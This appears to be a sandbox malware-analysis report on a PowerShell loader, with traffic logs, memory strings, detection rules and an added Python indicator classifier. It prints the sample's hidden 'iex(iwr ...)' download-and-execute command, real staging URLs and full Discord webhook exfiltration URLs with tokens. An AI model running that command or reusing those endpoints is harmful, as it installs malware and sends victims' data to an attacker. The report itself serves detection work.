Source: global traffic; HTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Content-Type: application/json; Host: discord.com; Content-Length: 298; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: raw.githubusercontent.com; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: pastebin.com; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: raw.githubusercontent.com; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: pastebin.com; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: raw.githubusercontent.com; Connection: Keep-Alive
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: raw.githubusercontent.com; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: pastebin.com; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: raw.githubusercontent.com; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: pastebin.com; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: raw.githubusercontent.com; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: raw.githubusercontent.com; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: pastebin.com; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: raw.githubusercontent.com; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: pastebin.com; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: raw.githubusercontent.com; Connection: Keep-Alive
Source: global traffic; DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic; DNS traffic detected: DNS query: discord.com
Source: global traffic; DNS traffic detected: DNS query: pastebin.com
Source: unknown; HTTP traffic detected: POST /api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Content-Type: application/json; Host: discord.com; Content-Length: 217; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
  • Date: Tue, 15 Oct 2024 13:54:30 GMT
  • Content-Type: application/json
  • Content-Length: 45
  • Connection: close
  • Cache-Control: public, max-age=3600, s-maxage=3600
  • strict-transport-security: max-age=31536000; includeSubDomains; preload
  • x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
  • x-ratelimit-limit: 5
  • x-ratelimit-remaining: 4
  • x-ratelimit-reset: 1729000471
  • x-ratelimit-reset-after: 1
  • via: 1.1 google
  • alt-svc: h3=":443"; ma=86400
  • CF-Cache-Status: DYNAMIC
  • Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fv34Bm0hZ7hp6mBEyYE%2FiN25d%2BPcp9UNScYkru13Bj7kXmAJuQezDRWwHiwynJLOYJb3LvUa12F0Xpn9FGaOB3oF0dsXL1QktYE2vklRgfn4XFknCGnjyNB9Dc1n"}],"group":"cf-nel","max_age":604800}
  • NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  • X-Content-Type-Options: nosniff
  • Set-Cookie: __cfruid=28b32a450ff2bac380e830d167c0604ce7a5a202-1729000470; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
  • Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
  • Set-Cookie: _cfuvid=lQe0Iw2OKxzgySPaR37b46io8PxLRVd4alq_N7AH9uM-1729000470457-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
  • Server: cloudflare
  • CF-RAY: 8d304d2bba08a916-DFW
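The request list above shows the whole loop the loader runs: GETs for its next stage from raw.githubusercontent.com and pastebin.com, and small JSON POSTs to two Discord webhooks; Suricata tagged three of the TLS sessions to 162.159.138.232 as Fake Robux bot registration and host-details exfil. One caveat on the "known web browser user agent" signature: the User-Agent string here, although it begins with Mozilla/5.0, is the default sent by Windows PowerShell 5.1's Invoke-WebRequest, so the WindowsPowerShell/ token in it is itself a usable indicator. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it classifies such requests and extracts the webhook ids and staging URLs an analyst would pivot on. The requests are transcribed from the list above; the github.com browser request is a constructed benign control, and the tag names and thresholds are the example's own.

```python
"""Classify HTTP requests for the paste-site staging and webhook exfil pattern.

Added example for this report; not code from the sample or from Joe Sandbox.
"""
from __future__ import annotations

import re

# User-Agent sent by Windows PowerShell 5.1's Invoke-WebRequest by default
# (value as it appears in the report's HTTP requests).
PS_UA = "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682"

# Requests transcribed from the HTTP traffic list above, plus a constructed
# browser request as a benign control.
SAMPLE_REQUESTS = [
    {"method": "GET", "host": "raw.githubusercontent.com",
     "path": "/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt",
     "user_agent": PS_UA},
    {"method": "POST", "host": "discord.com",
     "path": "/api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI",
     "user_agent": PS_UA, "content_type": "application/json", "content_length": 217},
    {"method": "GET", "host": "pastebin.com", "path": "/raw/sA04Mwk2", "user_agent": PS_UA},
    {"method": "GET", "host": "raw.githubusercontent.com",
     "path": "/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt", "user_agent": PS_UA},
    {"method": "POST", "host": "discord.com",
     "path": "/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2",
     "user_agent": PS_UA, "content_type": "application/json", "content_length": 298},
    {"method": "GET", "host": "github.com", "path": "/",  # constructed benign control
     "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                   "(KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"},
]

PS_UA_RE = re.compile(r"\bWindowsPowerShell/(\d+(?:\.\d+)+)")
# Discord webhook URLs: numeric snowflake id, then an opaque token.
WEBHOOK_RE = re.compile(r"^/api/webhooks/(\d{17,20})/([A-Za-z0-9_-]{20,})$")
# Hosts this loader stages from, and the path shapes that mean "raw file".
RAW_STAGING = {
    "raw.githubusercontent.com": re.compile(r"^/[^/]+/[^/]+/.+"),
    "pastebin.com": re.compile(r"^/raw/[A-Za-z0-9]+$"),
}


def powershell_version(user_agent: str) -> str | None:
    """Return the PowerShell version from a default Invoke-WebRequest UA, else None."""
    m = PS_UA_RE.search(user_agent)
    return m.group(1) if m else None


def classify(req: dict) -> dict:
    """Tag one request; returns its tags plus any webhook or staging URL it exposes."""
    tags: set[str] = set()
    info: dict = {}
    ps_version = powershell_version(req.get("user_agent", ""))
    if ps_version:
        tags.add("powershell_client")
        info["powershell_version"] = ps_version
    host, path = req["host"].lower(), req["path"]
    if host == "discord.com" and req["method"] == "POST":
        m = WEBHOOK_RE.match(path)
        if m:
            tags.add("discord_webhook_post")
            info["webhook_id"], info["webhook_token"] = m.group(1), m.group(2)
    if host in RAW_STAGING and req["method"] == "GET" and RAW_STAGING[host].match(path):
        tags.add("raw_paste_download")
        info["staging_url"] = host + path  # scheme omitted: not visible in the request line
    # A scripting client talking to paste or webhook endpoints is the high-confidence combination.
    if ps_version and tags & {"discord_webhook_post", "raw_paste_download"}:
        tags.add("scripted_staging_or_exfil")
    return {"tags": tags, **info}


def summarize(requests: list[dict]) -> dict:
    """Collapse per-request results into the indicators an analyst would pivot on."""
    results = [classify(r) for r in requests]
    return {
        "webhook_ids": sorted({r["webhook_id"] for r in results if "webhook_id" in r}),
        "staging_urls": sorted({r["staging_url"] for r in results if "staging_url" in r}),
        "flagged": sum(1 for r in results if "scripted_staging_or_exfil" in r["tags"]),
        "total": len(results),
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_REQUESTS).items():
        print(f"{key}: {value}")
```

The webhook id and token are what you need to get the channel shut down and to search other telemetry for the same operator; the staging URLs are the pivot for retrieving the second stage (cr_asm_crypter.txt, gaber.txt and the pastebin paste) before the operator rotates them.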
Source: powershell.exe, 0000000C.00000002.2820044032.000001C72A609000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.mw
Source: powershell.exe, 00000004.00000002.2573186277.0000024209A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C7137B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60AD9C000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://discord.com
Source: powershell.exe, 00000004.00000002.2596705455.0000024217DC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2596705455.0000024217C7D000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000C.00000002.2784074879.000001C712D5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C71280A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C712D7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A36A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D609DF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A34E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pastebin.com
Source: powershell.exe, 00000010.00000002.2859298831.000001D609DF8000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 00000004.00000002.2573186277.0000024207E34000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.2573186277.0000024208F5A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://raw.githubuserconte
Source: powershell.exe, 00000004.00000002.2573186277.0000024208F5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2573186277.00000242091F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2573186277.000002420920F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2573186277.0000024207E34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C712DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C712E2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A418000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A3E9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 00000010.00000002.2859298831.000001D60A3E9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: powershell.exe, 00000004.00000002.2573186277.0000024208F5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2573186277.0000024207E34000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypte
Source: powershell.exe, 00000004.00000002.2573186277.0000024207C11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C71235C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60994C000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2573186277.0000024207E34000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000C.00000002.2820044032.000001C72A609000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.microsoft.c4
Source: powershell.exe, 0000000C.00000002.2784074879.000001C7138EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60AED2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://0.discor
Source: powershell.exe, 0000000C.00000002.2784074879.000001C7138EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60AED2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://0.discord.com/
Source: powershell.exe, 00000004.00000002.2573186277.0000024207C11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C712333000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C71235C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60994C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D609939000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.2596705455.0000024217C7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.2596705455.0000024217C7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.2596705455.0000024217C7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.2573186277.0000024209A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2573186277.0000024207FC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C7137B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60AD9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
Source: powershell.exe, 0000000C.00000002.2784074879.000001C7138EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60AED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/
Source: powershell.exe, 0000000C.00000002.2784074879.000001C7137B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60AD9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/128545359042878
Source: powershell.exe, 0000000C.00000002.2784074879.000001C712E93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A4C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQ
Source: powershell.exe, 00000010.00000002.2859298831.000001D60A4C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60AD9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A4C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2922437661.000001D621E30000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A4B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A389000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_
Source: powershell.exe, 00000004.00000002.2573186277.0000024207FC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kN
Source: powershell.exe, 00000004.00000002.2573186277.0000024207E34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.2573186277.0000024208BEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C71280A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D609DF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.2596705455.0000024217DC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2596705455.0000024217C7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000C.00000002.2784074879.000001C712D6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A35A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
Source: powershell.exe, 0000000C.00000002.2784074879.000001C712D5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C712D6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A35A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A34E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 00000004.00000002.2573186277.00000242091F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercont
Source: powershell.exe, 00000004.00000002.2573186277.00000242091F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2573186277.0000024207F97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C712E2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A418000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000004.00000002.2573186277.0000024209236000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2573186277.00000242092A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2573186277.000002420923F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2573186277.0000024207FC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/DriverDiag.dll
Source: powershell.exe, 00000010.00000002.2859298831.000001D60A36A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: powershell.exe, 00000004.00000002.2573186277.00000242091F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2573186277.0000024207F97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypt
Source: unknown | Network traffic detected: HTTP traffic on port 55614 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 55617
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 55624
Source: unknown | Network traffic detected: HTTP traffic on port 55611 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 55614
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 55625
Source: unknown | Network traffic detected: HTTP traffic on port 55617 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 55620
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 55611
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 55622
Source: unknown | Network traffic detected: HTTP traffic on port 55620 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 55622 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 55624 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 55625 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.12:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.12:55611 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.12:55614 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.12:55617 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.12:55620 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.12:55622 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.12:55624 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.12:55625 version: TLS 1.2

System Summary

Source: amsi64_6988.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_2132.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7056, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6988, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2132, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Users\user\Desktop\OSLdZanXNc.exe | Code function: 0_2_00007FF674C51530
Source: C:\Users\user\Desktop\OSLdZanXNc.exe | Code function: 0_2_00007FF674C57C00
Source: C:\Users\user\Desktop\OSLdZanXNc.exe | Code function: 0_2_00007FF674C53430
Source: C:\Users\user\Desktop\OSLdZanXNc.exe | Code function: 0_2_00007FF674C58C30
Source: C:\Users\user\Desktop\OSLdZanXNc.exe | Code function: 0_2_00007FF674C53320
Source: C:\Users\user\Desktop\OSLdZanXNc.exe | Code function: 0_2_00007FF674C53AC0
Source: C:\Users\user\Desktop\OSLdZanXNc.exe | Code function: 0_2_00007FF674C55BF0
Source: C:\Users\user\Desktop\OSLdZanXNc.exe | Code function: 0_2_00007FF674C52EF0
Source: C:\Users\user\Desktop\OSLdZanXNc.exe | Code function: 0_2_00007FF674C510E0
Source: C:\Users\user\Desktop\OSLdZanXNc.exe | Code function: 0_2_00007FF674C562B0
Source: C:\Users\user\Desktop\OSLdZanXNc.exe | Code function: 0_2_00007FF674C579B0
Source: C:\Users\user\Desktop\OSLdZanXNc.exe | Code function: 0_2_00007FF674C58B60
Source: amsi64_6988.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_2132.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7056, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6988, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2132, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal84.troj.evad.winEXE@21/16@3/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6828:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qasgochu.l5o.ps1
Source: OSLdZanXNc.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\OSLdZanXNc.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\OSLdZanXNc.exe "C:\Users\user\Desktop\OSLdZanXNc.exe"
Source: C:\Users\user\Desktop\OSLdZanXNc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\OSLdZanXNc.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}
